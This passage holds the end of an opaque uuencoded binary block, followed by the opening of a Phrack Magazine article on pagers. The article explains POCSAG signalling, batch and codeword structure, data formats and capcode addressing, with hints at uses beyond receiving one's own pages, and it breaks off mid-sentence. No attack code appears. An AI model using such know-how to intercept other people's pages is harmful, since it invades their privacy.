|
MQ\'GP?_!P\''P>>/G\'_#PX>>\'SP>,/CCX_P?X.'QX<?\'\?,'_P=_!QY_"S
|
|||
|
M'P/"_Q_!_@]GP?F"!Q^`'G_!_A["'PX8`'`?P?\?CQ_!_C_!_YX9P>?!S\'_F
|
|||
|
M``\>/QY_P<?!PQ\./AP87L/_#C\;P>`#P<?!_,'"#\''Y?_=_\'^#G_4_S^?-
|
|||
|
MC\+_#\'_P?X_P?\_P?_$'WX'P<_!Y\'_P>/!S\'GAQ_!_P\?#'_![0>/'CX_.
|
|||
|
MP?\.'QX^?\'\?#[!SX>?PA\'PO\?P?X_P>?!^8_"'P\>?\'^?P\?#AP'?@_!Y
|
|||
|
M_Q^//\'^/\'_'AO!YX_!_P8/'C\>?\''!Q\./CQ\?G_"_PX_!\'C@X?!_,'`C
|
|||
|
M!\'/Y?_>_P?D_Y_!_P_$_\+OP<8?P?\&'P?!_\'^!X8?PC_!_P[#'W_!_CX'3
|
|||
|
MP<<'C\(?AY_!_Q_!_C\GP>N/P<\?#QY_P?Y_CQ\/'Y_!_X?!_Q^//\'_/\'GF
|
|||
|
M#P?!QX_!_P_!_Q]_C\'_P<('/PX^/W@.?\+_#C\'P<?!_\''P?_!P@?!Q^7_'
|
|||
|
MWO\'\/\$?X?!_\'^#\'@/\'_/\'_'C\>/,'_P?P^`<'@#X_"'X>/P?\_P?X^/
|
|||
|
M,<'APL?"'QY_P?Q_CQ\>/<+_P>?!_Q^//\'^/\'G'P/!YX_!_P_!_QY_G,'_;
|
|||
|
MP<`'/PP^/,'X`'_"_X0_`\'GP?G!Y\'\P>"CP<?E____T/\_Q?_!^<G_P?W!5
|
|||
|
M_\'AP?!_P>?"_\''P>_!_S_!_B!X8<'AP<<_*!A_P?C!_\'//3PXP?C!Y\'C2
|
|||
|
MP?_"OS_!_S_!XY\!P>/!S\'_C\'_/G^8P?_!X<'_/[Q\>,'P8,/_P>!_(<'AC
|
|||
|
MP?G!X\'XP?'!\,'CY?___]#_/]+_P?C$_\'/Q/_!X,'X0<'P#\'_P<`0P?_!Z
|
|||
|
M^,'_P<^`/'APP>'!X\'_P=!^?\'_,\'CG\'#P>/!S\/_P?Y_N,'XP>/!]G_!Z
|
|||
|
M_'QXP?#$_\'@?G'!X<'QP>/!\,'QP?#!X^7____0_W_<_\'PP?AQP?!_P?_!-
|
|||
|
MX,'XP?_!^,+_P>#"?&'!\&?!_\'@?G_!_\'@=\'_PN/![\/_?GA\>,+S?GS"J
|
|||
|
M>,'XP?S#_\'@?G'!\<'XP>/!^,'QP?#!\^7____H_S_'_\'YPO_!\<7_P<!_I
|
|||
|
MP?X#P?`?P?_!X,)_P?_!P#_!W\''P>?!S\'_'\'_/P!^<,'QP<<('CAXPOC"7
|
|||
|
M_\'/P<(^<<'AP?'!X\'XP?/!\,'CY?___^?_P?X?T__!W\'_G\7_P<8?G\'?F
|
|||
|
MP?_!W\'_G\'_'X!^`\'P#X`?`#[!_AC"_\''AQX[PL/!Q\'\PO/!Q^7____H#
|
|||
|
M_S_E_X_!_P_!_@^&'P1_P?X'P>?!_\'&#PQ_P<$'P<?!_,'S!\'/G^3_____;
|
|||
|
M_];_C\+_#\'GP?_![Q^'P?_!Y@^/POX'P<\?Y/______VO_!]\3_P?W!_Y^/D
|
|||
|
MP?[!_P_!S[_D_______:_\'SQ/_!^,/_P?S"_\'OY?_-_\CPP?'!\,/QP?#!$
|
|||
|
M\<'Y___\_\'SQ/_!_L/_P?Y_Y__-_\'PQ6#'<,'P<,'PP?G!^,+_P?W!^___8
|
|||
|
M^__!_L3_?^?_S?_!^\'XP?'!^,'P8,-`<,-``,-`Q`#"0&!PP_#!^,/[P__!*
|
|||
|
M^______;_]'_P=_%GP\>#PX?#PK"!LH"!L,.PA\/PQ_!W______7_^+_PY\?O
|
|||
|
MQ`\'#\D&#L(&RP^?O\'?O______%_^C_P=_#C\,/!P\'#\,'QP;&!\0/PX^?I
|
|||
|
MP_^?PM_"_\'?___W__;_O\'_O\*?K\(/P@["!,(`!,4`!,0`!,(&!\,/CQ^_^
|
|||
|
MPO^_PO^____L__W_P_W!\<+PP>#"8,D@Q@#$(,/@8,'@8,'@8,'@P?'!\,+YI
|
|||
|
MPOW__^/_S?_!_F/!X,'WP?S"]\'@P?_!\,'\P?'!X,'WP?#!^,'\P?/#_\'WZ
|
|||
|
MZ/_!^<+QP?C!\,'QP_#"X,+PP>#+8$#$8,7PP?'__]S_S?_!_'/!X,'WP?C!/
|
|||
|
M\\'WP>#!_\'P?&'!X'?!X,'P?'/!_\'SP?_!\</_P?GK_\'XP?W!\,/XR/!P$
|
|||
|
MP?#$<,5@<&##<,'PP?C!^<'[Q/W__]/_S?_!Q'O!W,'GP<QAP>9XP?_!PWS!;
|
|||
|
M^YO!XQAP>$'!_@'!S@'!\<'_P?/!P'O!\X#!\'_#_\'XP?_!_L'Q]/_"^\'X@
|
|||
|
MP?#"0,(`0,8`0,(`0'!@<,'PP?C"^</[P?G!^___Q?_-_\'.?Y_!YXY#P<8^$
|
|||
|
MP?^/GL'_G\'F'G><&\'^`XX+P>/!]\'GP<`_P?<`8!_!_W\_P?X?P?X'G@_&T
|
|||
|
M_\'?[_^?C@X/#@(.`LH`Q`+"!@\"!@X/PQ___\W_P<\/C\'GCD5.?\'_G\'.+
|
|||
|
M'X_!YS_!_\'^/\'^/XX_P>'!Y\'#P?P_P?<>9Q_!_C\?,@_!_P^.#Y_!QC_"4
|
|||
|
M[\'_!\'OA\'_?L(/PO\/PO_"#\'_/Y_"_\'?Y?\/CP_"'\</#L(&!,@&#L4/5
|
|||
|
MPQ_U_\W_P<\'A\''CD<&?\'_'\'.#X?!YS_!YYX/P?\?CW_"Y\''P?_!]\'G@
|
|||
|
M'F?!_\'^/AXWA\'_PH\/G\''/\'/P<?!SP?!QP?!_G["!\'_;@_!_W_"!\'_/
|
|||
|
M'P_"_X_#_Y^/YO_#G\2/Q0\'P@_"!P;"!\,&PP?)#X\/PH^?Z/_-_\'/@\'\>
|
|||
|
M)XY&!G0_O\',!X?!YG_!\`P!P?\'A\'_P>!GC<'\P?/!XQYGP?_!_#X.<\'S9
|
|||
|
MP?^/PY_!S\'_P<QCP<X<9Q[!_#_"'\'^<!_!_CP'`,'@#@3!Y\'_@,'OP<_!4
|
|||
|
M_!\'P>0_P>0_Q/_![Y_!_[^?P?^_Z_^_G\(/#`3+``0`P@8$!P\?OY^_G[_!T
|
|||
|
M_\._VO_-_\'GP?'!^&?!S&0$<'^_P>PG@<'F?\'P.`'!_X&`P?#!X&?!R,'XK
|
|||
|
MP?'!\R!@P?_!^#P,PO'"_\._P>_!_\'LP>'!YGQB?\'X?SY_P?YQP?_!_#TOX
|
|||
|
MPN'!SC!AP>>@P>/![\'P?"'!X'_!X#W$_\'@.<'@?"/!_\'CP>#!_\'@PO_!P
|
|||
|
M\<'YV?_!_<[_POW!\,/@Q&#!X,(@`"#%`,8@8,,@PF#!X,/QP?7!_=+_S?_!2
|
|||
|
MX,'PP?AAP>!BP<!X?\'_P>S"_\'R?\'QP?C!\<'_P?#!P,'P8&/!P,'XP?'!$
|
|||
|
M\P#!\'_!\<'\8,+QQ?_!X,'_P=S!\,'F?&!_P?!_?G_!_G'!_\'X/\'_P?/!0
|
|||
|
MX\'B>&#!\\'_P?'!_\'QP?C!\,'@P?_!X,'YP?_!Q\'N?L'P>,'@P?C!\\'\T
|
|||
|
M8<'@?\'@?F/!X,'P?,'_P?##_\'\P?/1_\'\VO_!^<'PP?C'\,'@P?#!X'!@O
|
|||
|
MP>#$8'#&8,'@P?#/_\W_P>#!\'APP?ACP>!X?\'_P?S"_\'P?L'QPOC!_L'XA
|
|||
|
MP>#!^'#!XV#!^,'QP?-PP?#!_\'PO'#"\<7_P>!_P?C!\,'V?&!_P?!_?G_!)
|
|||
|
M_'#!_\'X?\'_P?/![\'@>&#!]\'_P?!_P?'"^,'WP?_!\<'YP?_!Y\'\?,+X4
|
|||
|
MP>#!^,'_P?QQP>#!_\'@?'/"\'S!^<'@?\+_P?AQT?_!_.#_P?O!^<']POG%&
|
|||
|
M^,3PP?C#\'#!\,-@S__-_\'L`<'`<!S!Y\''@'_!P#S"_\'W@'#"^,'\>,'$7
|
|||
|
M>&/!PP#!^,'QP?-\<\'_P?`<<'/!\<'_P]^?P>'!_\'<P>)&?F)_P?`_?@/!1
|
|||
|
M_G`?P?C!W[_!\\'/P>(`8&.!P?A_P?#!^<'\9\'?P>/!V<'_`\'.'L'\P?G!)
|
|||
|
MY\'XP?_"^,''P=_!Y\'&PO_!\\'X><'@'X_!S\'X`-'_P?W!_\'QP?_!_L'[8
|
|||
|
M[__!^\'XP?G/_\W_P<\'@GH>P>^/@'_!P!_!_Y_!YX)R'L+^'8X>)X<.?\'[5
|
|||
|
MP<<^9\'_P>`.,'/!\\'_Q)_!S\'_GD8&?D9_P>(?/@_!_@(?P?G"'\''C\'FP
|
|||
|
M`$('`L'\/\'P&<'^1Q_![Q_!_P?!SA[!_L'YP<?!_!_!_L']CY_!QX[!_Q_!O
|
|||
|
M_\'\?<'/'P^/'QY_TO^#P?_!_@>/___!_\[_G\7_P<_&_X_!_@_"_P?!SP9O0
|
|||
|
MP<_"/\'^#SYG'\'GCCPSA\'_PH^?'\'/P?^.9P\^!S]`'\(_P?XOP?_!^`\?U
|
|||
|
MP>>/P<8.9P</P?Y_P?(=P?X$'\'@'\'_%\'.#G]]P<8\#\'_P?X''\'/P<;")
|
|||
|
M#\'G/!W"CP^''\(_TO\./Q_"#___P?_=_P_"_P_!WX=_P>_"?\'_#\'_9A_!*
|
|||
|
MY\'./C</P?^/PI\/P<_!_X[![X\>1Q\'#\(_P?XGP?_!X@\?P>>/A@Y'!X_!C
|
|||
|
M_L'_P?>_P?X''\'''\'_!\'.#\+_ASX/PO\&'\'/AL('P<8>'\*/!X>?'S_2P
|
|||
|
M_P\^'\(/___!_^C_O\+_'\/_P?P/P?_!WY^_A<'`/Y[!_XX!P>>,PL\_#\'^[
|
|||
|
M?\'_P>>/G\'GP<>&/F>'G\'^P?_!]\']P?[!QY_![\'_P?X!P<YDP?[!_<''"
|
|||
|
MP?R_P?W!_(<?P>?!Q@\'P>0\B<'/C@>/G\(_TO^?/A^/'___P?_O_\']Q?_!@
|
|||
|
MX<'@/\+_P>\!P??!X<'OPO\AP?[!]\'_P>?![\'_P>?!X(Y\8\'GN<'\P?_!&
|
|||
|
M\\'XP?G!Y\'_P>_!^<'\(,'NP?#!_,'YP>?!^,'_P?C!_<'GO\'GP>3!_[_!J
|
|||
|
MX<'XP>'![\',(\'YO\(_T/_!_<'_OSR?P?\____!__7_P?/!^<3_P??!_\'S+
|
|||
|
MP__!\</_P??#_\'P?L'^P?/!Y\'`P?S!_\'SP?QQP>?!_\'GP?C!_,'PP>S!:
|
|||
|
M\,+XP>?!^,'_P?C!\<+_P>/!Y,+_P?/!^,'AP?_!T`'!^#_!_W_0_\']PO_!+
|
|||
|
M^,+_P<#__\'____*_\'XQ/_!\,'\P?_!\\'^<</_P?A\P?C!_,'XP?S!^,'_]
|
|||
|
MP?C!_\'XP?'"_\'@?,+_P?'!^,'QP?_!^''!_,-_T/_!_<'_P?YXPO]@___!&
|
|||
|
M____S__!^\C_P?QOP?[#_\'YP?_!_<'_P?X#PO_!X'X#P?_!\'C!\<'@&,'Y;
|
|||
|
MP=S#/]#_P?W!_SX8#\'?F___P?___^/_#\+_P>8^!\'_P?`?P?O!PAO!_Y\?K
|
|||
|
MPC_2_QX8#Y\?___!____Z_\?P?_![W_!_\'?/[\_TO\>/P>/#___P?____/_R
|
|||
|
M/]+_#V?!YY\/___!_______%_\']P?^'P_^$___!_______%_\']___'____G
|
|||
|
M___%_\']___'_______%_\']___'_______%_\']___'_________\W_____L
|
|||
|
M____S?_________-_______%_\']___'_______%_\']___'_______%_\']1
|
|||
|
M___'_______%_\']___'_______%_\']___'_________\W_________S?__W
|
|||
|
M_______-_______%_\']___'_______%_\']___'_______%_\']___'____%
|
|||
|
M___%_\']___'_______%_\']___'_________\W_________S?_________-]
|
|||
|
M_______%_\']___'_______%_\']___'_______%_\']___'_______%_\']`
|
|||
|
M___'_______%_\']___'_________\W_________S?_________-________T
|
|||
|
M_\W______\7_P?W__\?______\7_P?W__\?______\7_P?W__\?______\7__
|
|||
|
MP?W__\?_________S?_________-_________\W______\7_P?W__\?_____\
|
|||
|
M_\7_P?W__\?______\7_P?W__\?______\7_P?W__\?______\7_P?W__\?_P
|
|||
|
M________S?_________-_________\W_________S?______Q?_!_?__Q___5
|
|||
|
M____Q?_!_?__Q_______Q?_!_?__Q_______Q?_!_?__Q__________-____$
|
|||
|
M_____\W_________S?_________-_______%_\']___'_______%_\']___']
|
|||
|
M_______%_\']___'_______%_\']___'_________\W_________S?______O
|
|||
|
M___-_________\W______\7_P?W__\?______\7_P?G__\?_SO_!^?__]?_!2
|
|||
|
M_?__Q__._\'YP?O___3_P?W__\?_S?^&`@`"`,D"Q`8.Q1\/P=______Y?_-X
|
|||
|
M_X\'Q08.Q@;$!,(&PP\.PP\?G______B_]#_P=_"G\/_P<^_G\*/#X_&#\T'0
|
|||
|
MQ0_"C\.?P?^/_____]#_X/^_PO^_PH\/!L0$QP`$P@8'P@^/GX^______\__J
|
|||
|
M[/_!_<+YPO'!^,'QP?#!X"#!X,(@P@#)(,)@P?'!X<'@P>'!\<']]__!_?__$
|
|||
|
MQ__S_\'[QO#!X,'PP>#&8$!@0,)@P>!@P>#!\,+QP?#!_\']\O_!_?__Q__-Q
|
|||
|
M_\'\P?_!\<3_P?/!_\'PP?S!^\'YP?_!^<'XP?W?_\+]P?_"^</XQO#%<,)@_
|
|||
|
MQ'#&\,']P?_#^,'[P?W"^=[_P?G__\?_S?_!_`_!X<3_P</!_\'PP?Q[P>'!K
|
|||
|
M_\'AP?#!_>O_P?/!\,)@0'#$0,8`0&!`PG#!^&#"X,/PP?O!_\+[VO_!^?__A
|
|||
|
MQ__-_XX'!L''CL''P<\.P?^&'`<&P<X"P>(<!QX/P__!_G\^#\+_P?X?P=_!8
|
|||
|
M_Q_!W^;_PM^>P@_##LD"`,("Q@8/#A^?P=___];_S?\,#PY/CD>/#\'_CQ["N
|
|||
|
M#XX.9QP''`_!_W_!_\'^/SX/PO_!_@^/P?X/C\+_'^;_G\+?GQ_'#\,.R`8.-
|
|||
|
M!@\'Q0_#'\'_O___S?_-_XX?#\''CD>./\'_'X_!_Q_!SA_!Y\'_P?>_C\'^G
|
|||
|
M/\'^?L(_C\'_P>?!_P>&,P\'P<8>!\'_P<_![\'_!\'_P<_"_X_"_\'/ZO_#9
|
|||
|
MC\(/C\0/P@?$!@?"!L,'PP^/P@_"CY_!W___P?_-_XP_#\''C&&&?\'_/XS!6
|
|||
|
M_Q_!SG_!Y\']P?/!_<'_P?P]P?A^/CS"_\'AP?F'C#`'#\'`'`?!_X_!Y\'OO
|
|||
|
M`\'_A<+_A\+_P<;&_[_!_[_J_[^?CP["!@`$QP`$P@#"!,(&P@___\W_P<PCY
|
|||
|
MP>#!YXC!X,'D<,'_O\'L)@'!Y,'_P>!XP>'!^,'_P?@YP?!^PCS"_\'@P?G!B
|
|||
|
M\;\QP>,_P>/!^,'SP?_!Q\'AP><XP?_!X&?!Y[!YP?/!P,'_P>_"^<'OP><AK
|
|||
|
MP?`X(_'_P_W!\,'YP?'!\,'@8"!@Q"``PR#&8,/@Q&#!X"#"8,'@P?##^>;_%
|
|||
|
MS?_!W,'CP>#!Y\'8P>#!P'#"_\'L8@#!Y,'_P>!P8\'X?\'X><'P?,(XPO_!/
|
|||
|
MX,'YP?'!_\'QP>-_P>/!^,+_P</!X<'G>,'_P?AGP>;!^'#!\\'QP?_!S\'Y@
|
|||
|
MP?'!Q\'F(,'P>&/Y_\'XP?G'\,'@8,'@Q6!`PV#%0,(`0&!PP>!@PN#$\,+Q2
|
|||
|
MPO#<_\W_P?G!\<'X9\'XP>8@>,+_P?S!_GG!Y,'^P?#!^,'SP?[!X\'XP?'!2
|
|||
|
M\'QP>'_!_\'@><'YP?_!\&,PP?#!^'_!_\'QP?#![GQ_P?Y@P>9^>,'SPO_!R
|
|||
|
MX\'XP?'!Y\'F>,'QP?C!\?__Q?_!^<'PP?S!\,'YP?C!\,/XS?##<&!PQ&!P;
|
|||
|
M8,)PPO##^=/_S?_!R<'SP?QGF,'F`'Q_/\'<P?]_P>3!_L'CP?C!\\'_P>/!!
|
|||
|
M^<'!P>`^0#AOP?_!P'G!^;^P`P#!\'@/P?^QP>#![WY_P?Y@P<9^>,'SP=_!B
|
|||
|
M_\'#N<'QAX9XP?/!^,'S___:_\'[P?_!^\'PP?/!X,'PPF##0,4`0,)@<,'Y[
|
|||
|
MP?O0_\W_P<X#'@<>P<>&''^/'L'_'\'.'F?!_\'[P?_!]\'_P<'!PA[!PSS"4
|
|||
|
M_X`[P?N?$X<?P?\?@\'_`<'N#\(_@$`.?QL3@L'_@YG!^X<'#,'WP?S!T___6
|
|||
|
MYO_!W\(?'@X&Q@+/_\W_C@<,)QY/CPQ_CS_!_S^/#V>_PO_!Y\'_P>.''L''<
|
|||
|
M/\+_A#_!_Y\WP<\?P?\?A\'^`<'O#\(_AT<.?QL7A\'_#QW!_X</!<'G/`?_J
|
|||
|
M_^O_O\0/#@?/_\W_P=\/A\'O'\'OCX?!_\''/\'_O\'/!\'F#\'_P?X'PO_".
|
|||
|
MC\''/@_!_X\?AY\WP<<?P<^/P?_!_@?![P_"/X_!Q\'//Q^'C\'_CQ_!_X</_
|
|||
|
M!L'G/@?___'_P=_/_\[_O\'OP?]_PO^/P?_![\3_A\'@'\'_P?X/PO^?P=_!8
|
|||
|
MYSP'P?^?N`>,-\'G#\''F<'QP?X(P>\//G^?P>?![CX[@Y_!_YP=P?N0+QS!Z
|
|||
|
MY\'\!______"_]S_P?W)_\'\8\+_P?AGP>#!^\'S`,'@."'"_,'OP<\@PO_"`
|
|||
|
MYSAYP>/"_\'\.,'QF&=\P?/!^,'S_____\+_ZO_!^,'_P?'!_\'WP>#!\'QG4
|
|||
|
MPOS!_\'O8,+_PO?!X,'[P>/!X,'_P?YXP>'!^,'F>,'SP?#!\______"__?_W
|
|||
|
MP?O$_\'PP?O!\\'@P?_!_L'X8\'XP?9PP?#!^,'S_____\+____!\,+_P?X?$
|
|||
|
MP?W!_P#!\#G!^______"____Q/_!W\+_P=_!_A______P__________-____J
|
|||
|
M_____\W_________S?_________-_________\W_________S?_________-R
|
|||
|
M_________\W_________S?_________-_________\W_________S?______D
|
|||
|
M___-_________\W_________S?_________-_________\W_________S?__R
|
|||
|
M_______-_________\W_________S?_________-_________\W_________>
|
|||
|
MS?_________-_________\W_________S?_________-_________\W_____R
|
|||
|
M____S?_________-_________\W_________S?_________-_________\W_R
|
|||
|
M________S?_________-_________\W_________S?_________-________]
|
|||
|
M_\W_________S?_________-_________\W_________S?_________-____R
|
|||
|
M_____\W_________S?_________-_________\W_________S?_________-R
|
|||
|
M_________\W_________S?_________-_________\W_________S?______D
|
|||
|
M___-_________\W_________S?_________-_________\W_________S?__R
|
|||
|
M_______-_________\W_________S?_________-_________\W_________>
|
|||
|
MS?_________-_________\W_________S?_-_\,/PA_"GS_!_\*?______3_'
|
|||
|
MS?_#!\4/Q(_$G\'_G[_"W______J_\W_CL($T``$`,,$`,(&P@["#Q^_G[_"R
|
|||
|
M_\*______]C_S?_!^,'PP>!@Q"!@Q2``(,H`PB``PR#!X&!QP?#"X<'QP_W_@
|
|||
|
M____U?_8_\'[PO_!^\'_P?G!_\'PP?',\&#"X,1@0,1@P>#!\,'@Q?#_____F
|
|||
|
MR__@_\']P?_!_<'XP?W#^,'YP?S"^,3PQ'!@<,1@<&#"<&##<,'XPOG!_?__G
|
|||
|
M___&__O_P?O!^,/P8,'`0,@`PF#!\&!XP?#!^?__^?_]_\+?PI^/#L("``+%.
|
|||
|
M`,,"!@(.'@^?PM____3____)_[^?Q0\.PP\.R`8.!LH/PA_!_\'?P[___]S_7
|
|||
|
M___,_X^?PX\/CP^/#\,'QP8'PP;%!\0/C\(/C___V____]S_O\'_OY^_P?^/'
|
|||
|
MP@\&Q`3'``0`!`7"#Y\?PK___]'____A_\']P?O"_\']POE@P?#!X,)@QB#"1
|
|||
|
M`,4@8,'AP>#"\</]___*____P__!]^__POG%\,9@PD#"8,'@8,'PP>#!\,)@\
|
|||
|
MP>#(\,'QP_#!\\'YP__!^>W____"_\'^<\/_P?GM_\3XPO!PP?!PP?##<,I@I
|
|||
|
M<,5@QW#&\,+XP?#!_\'YP?O!_<'YY/___\+_P?1SP__!P'_!_<+_P?G!\'_!D
|
|||
|
M_`'&_\'XZ__"^<'_P?O!^,'[P?_!^\'XPO!PPD#"8,-``,=`S`##0,'@<,'[<
|
|||
|
MP?G:____PO_![G_#_XX_Q/_!\'_!_@/&_\'^'_;_PI_"WY\?P@X>#QX?'A\.<
|
|||
|
MP@8"#L4"Q0#"`@#"`@X?#\*?U?___\+_P<X?A\'G?Y\?P?["_\'\9\'_P?X_<
|
|||
|
MPO\_PO_![\'_#\;_/\'&'\/_AW_)_\'?]O^_GQ^?'\(/PP[(!@["#\_____"N
|
|||
|
M_\'.#X?!QW^/'\'?P<?!_\'J9\'_P?[!_\'/P?\_PO_![\'_A\'_G\3_/\''O
|
|||
|
M'\/_AW_)_X_]_\'OPH_$#\,'PP8'S____\+_P<\'C`8_A#>,P<9_P>1@?\'^0
|
|||
|
M'X3!P#@<9,'GP?_!]\'_G[\?P?\^/\'/G\'_P?Y_CG_$_\'?Q/\`Q?\'P?_!&
|
|||
|
M[\'_P>?^_Y_"O\_____"_\'OP>&`8'^`<\'(P<!_PN!_P?PCP<#!X#`X8,'GS
|
|||
|
MP?'!\\'_O3P_P?Q^?\'OP?W!_\'\P?^\><'_P?O!_\']Q?\PQ/_!_B'!_\'CK
|
|||
|
MP?_!X,3_P?G__\S____"_\'OP?B`P>#!_\'0<\'HP<!_P>#!_L'_P?QSP<!/Q
|
|||
|
M(+G!^&?!\$/!\<'XP>#!_\'XP?9_P?_!_,+FP?_!^''"X,+P/<'_P?C"_\'\#
|
|||
|
MPO!_P?_"^,'_P?'!_\'@?\/_P?#!Y___R____\+_P>S!^,+PP?_!^'/!^,'@Z
|
|||
|
M?\'@PO_!_'-`?F`YP?AGP?!C<<'XP>#!_\'XP?Y_P?_!_,'^P?;!_\'P<<'PQ
|
|||
|
MP>#!\'`]P?YX?\'_P?S"\#Y_P?C!^<'_P?'!_\'\?\'YPO_!\,'G___+____*
|
|||
|
MPO_!S''!V,'APO\SP<C!S\'_P<!_O\'\P?\!P<\@P?G!X&?!\<'C><'8!E_!"
|
|||
|
M\<'F?\'_P?S!\,'F?X#!Y[S!W\'@(\'(P>9YP=_!_P#!X&'!S&?!^<+_P>/!/
|
|||
|
M_\+?P?!X?\'SP>?!S\'_P>?!\G___\;____"_\'.`X_!SG\?$PS!S\'_@'^?F
|
|||
|
MP?[!_Q_!SP?!^\'&9\'[P<<[G`X?P>?!YG^?P=[!YL'.?X?!YQX?P<8'C\'&Z
|
|||
|
M.9_!_P+!W@>>'\/_A\'_PI_!PG@?P??!QP_!_P<&'P]____$____PO_!SP_!K
|
|||
|
MS\'OP?^?/@_!QG_!_V8?PO^.P<XO'XXGP?_!]S\/P=^'P?_!SW_!SXYWP>Y_V
|
|||
|
MG\'O'@_!Q@^/P<=X#\'_#\'L#Y\/P_^'P?_"C\'/'X_!_@8'/P?"#@<?___$R
|
|||
|
M____PO_![X_%_Q_!Y\+_P>8_PO^'P<8O'XXGP?_!YP?"CX?!_X]_P<\.=\'.&
|
|||
|
M?Y_![QX/P<\/C\''?Q_!_Q_!Q@^?#\/_!\'_PH_!SY^/P>(&!R<'P@X''___C
|
|||
|
MQ/___]3_?\'G?\'_P?<#G`X/P?P?P?_!QA[!\\'N?Y_!YXR.P<<G#,'&><+_R
|
|||
|
MOXPGG\''P_\0P?^?C\'/EX_!\00#!@,^'@<?___$____V?_!X\'\/#_!^#_!P
|
|||
|
M_\'P?\'QP?["_\'GP>'"X'`\P>9XP__!P&?!_<'GP?S!^,'_<,/_P>^QP>_!-
|
|||
|
M\<'D(R0#/``GO___Q/___^#_P?G&_\'QP_!\=L'X?,+_P>!WP?QGP?QPP?_!S
|
|||
|
M\,'_P=C!_\'FP?/!_\'SP>#!_\'$?\'_P>#__\;____H_\'YPOC!_L'_P?QXE
|
|||
|
MPO_!\,'_P?QWP?YAP?_!\,'_P>!_P?![P?_!\\'PP?/!_'O!_,'@P??__\7_&
|
|||
|
M___X_\'CP?_!X,'_P?!_P?_!\\'^`\'?`SQ&1___Q?______PO\/P?\/OA\/1
|
|||
|
M/___Q/______R/]____$_________\W_________S?_________-________S
|
|||
|
M_\W_________S?_________-_________\W_________S?_________-____R
|
|||
|
M_____\W_________S?_________-_________\W_________S?_________-R
|
|||
|
M_________\W_________S?_________-_________\W_________S?______D
|
|||
|
M___-_________\W_________S?_________-_________\W_________S?__R
|
|||
|
M_______-_________\W_________S?_________-_________\W_________>
|
|||
|
MS?_________-_________\W_________S?_________-_________\W_____R
|
|||
|
M____S?_________-_________\W_________S?_________-_________\W_R
|
|||
|
M________S?_________-_________\W_________S?_________-________]
|
|||
|
M_\W_________S?_________-_________\W_________S?_________-____R
|
|||
|
M_____\W_________S?_________-_________\W_________S?_________-R
|
|||
|
M_________\W_________S?_"'Y_"W________\C_S`\?G\'_O]/_PI_#_\*_2
|
|||
|
MSI_#O\'_QI^_RY^_PI^_G[_!_\6?P[^?O___[/_)!\@/C\*?Q?_(GX^?_X^/'
|
|||
|
MPY^/G\*/R)_!WY_"W\'_P=___]/_WP3&!@?'!L0$Q08'Q0\'PP8'#P</!\0/1
|
|||
|
/!]0/C\2?C\F?SK___]#_K
|
|||
|
``
|
|||
|
end
|
|||
|
sum -r/size 36774/43500 section (from first encoded line to "end")
|
|||
|
sum -r/size 656/73815 entire input file
|
|||
|
==Phrack Magazine==
|
|||
|
|
|||
|
Volume Five, Issue Forty-Six, File 8 of 28
|
|||
|
|
|||
|
****************************************************************************
|
|||
|
|
|||
|
|
|||
|
The Wonderful World of Pagers
|
|||
|
|
|||
|
by Erik Bloodaxe
|
|||
|
|
|||
|
Screaming through the electromagnet swamp we live in are hundreds of
|
|||
|
thousands of messages of varying degrees of importance. Doctors,
|
|||
|
police, corporate executives, housewives and drug dealers all find
|
|||
|
themselves constantly trapped at the mercy of a teeny little box:
|
|||
|
the pager.
|
|||
|
|
|||
|
Everyone has seen a pager; almost everyone has one. Over 20 million
|
|||
|
pagers are on the streets in the US alone, sorting out their particular
|
|||
|
chunk of the radio-spectrum. Another fifty-thousand more are
|
|||
|
put into service each day.
|
|||
|
|
|||
|
But what the hell are these things really doing? What more can we
|
|||
|
do with them than be reminded to call mom, or to "pick up dry-cleaning?"
|
|||
|
|
|||
|
Lots.
|
|||
|
|
|||
|
|
|||
|
** PROTOCOLS **
|
|||
|
|
|||
|
Pagers today use a variety of signalling formats such as POCSAG, FLEX
|
|||
|
and GOLAY. The most common by far is POCSAG (Post Office Standardization
|
|||
|
Advisory Group), a standard set by the British Post Office and adopted
|
|||
|
world-wide for paging.
|
|||
|
|
|||
|
POCSAG is transmitted at three transmission rates--512, 1200 and 2400 bps.
|
|||
|
Most commercial paging companies today use at least 1200, although many
|
|||
|
companies who own their own paging terminals for in-house use transmit
|
|||
|
at 512. Nationwide carriers (SkyTel, PageNet, MobileComm, etc.) send
|
|||
|
the majority of their traffic at 2400 to make the maximum use of
|
|||
|
their bandwidth. In other words, the faster they can deliver pages,
|
|||
|
the smaller their queue of outgoing pages is. Although these
|
|||
|
carriers have upgraded their equipment in the field to broadcast at
|
|||
|
2400 (or plan to do so in the near future), they still send out
|
|||
|
some pages at 1200 and 512 to accommodate their customers with older
|
|||
|
pagers. Most 512 and 1200 traffic on the nationwide services is
|
|||
|
numeric or tone-only pages.
|
|||
|
|
|||
|
POCSAG messages are broadcast in batches. Each batch is comprised of 8
|
|||
|
frames, and each frame contains two codewords separated by a
|
|||
|
"synchronization" codeword. A message can have as many codewords
|
|||
|
as needed to deliver the page and can stretch through several batches
|
|||
|
if needed. The end of a complete message is indicated by a "next address"
|
|||
|
codeword. Both addressing and user data are sent in the codewords, the
|
|||
|
distinction being the least significant bit of the codeword:
|
|||
|
0 for address data, and 1 for user-data.
|
|||
|
|
|||
|
Standard alphanumeric data is sent in a seven-bit format, with each codeword
|
|||
|
containing 2 6/7 characters. A newer 8-bit alphanumeric format is
|
|||
|
implemented by some carriers which allow users to send data such as
|
|||
|
computer files, graphics in addition to regular alphanumeric messages.
|
|||
|
The 8 bit format allows for 2.5 characters per codeword.
|
|||
|
|
|||
|
Numeric data is 4 bit, allowing up to 5 numbers to be transmitted per
|
|||
|
codeword. Tone and voice pages contain address information only.
|
|||
|
|
|||
|
(NOTE: Pager data uses BCH 32,21 for encoding. I don't imagine
|
|||
|
very many of you will be trying to decode pager data by building your
|
|||
|
own decoders, but for those of you who may, take my interpretation
|
|||
|
of POCSAG framing with a grain of salt, and try to dig up the
|
|||
|
actual POCSAG specs.)
|
|||
|
|
|||
|
** THE PAGING RECEIVER **
|
|||
|
|
|||
|
Paging receivers come in hundreds of shapes and sizes, although the vast
|
|||
|
majority are manufactured by Motorola. Numeric pagers comprise over
|
|||
|
fifty percent all pagers in use. Alphanumeric comprises about thirty
|
|||
|
percent, with tone and voice pagers making up the remainder.
|
|||
|
|
|||
|
Pagers are uniquely addressed by a capcode. The capcode is usually six
|
|||
|
to eight digits in length, and will be printed somewhere on the pager
|
|||
|
itself. Many pager companies assign customers PIN numbers, which are
|
|||
|
then cross-referenced to a given capcode in databases maintained by
|
|||
|
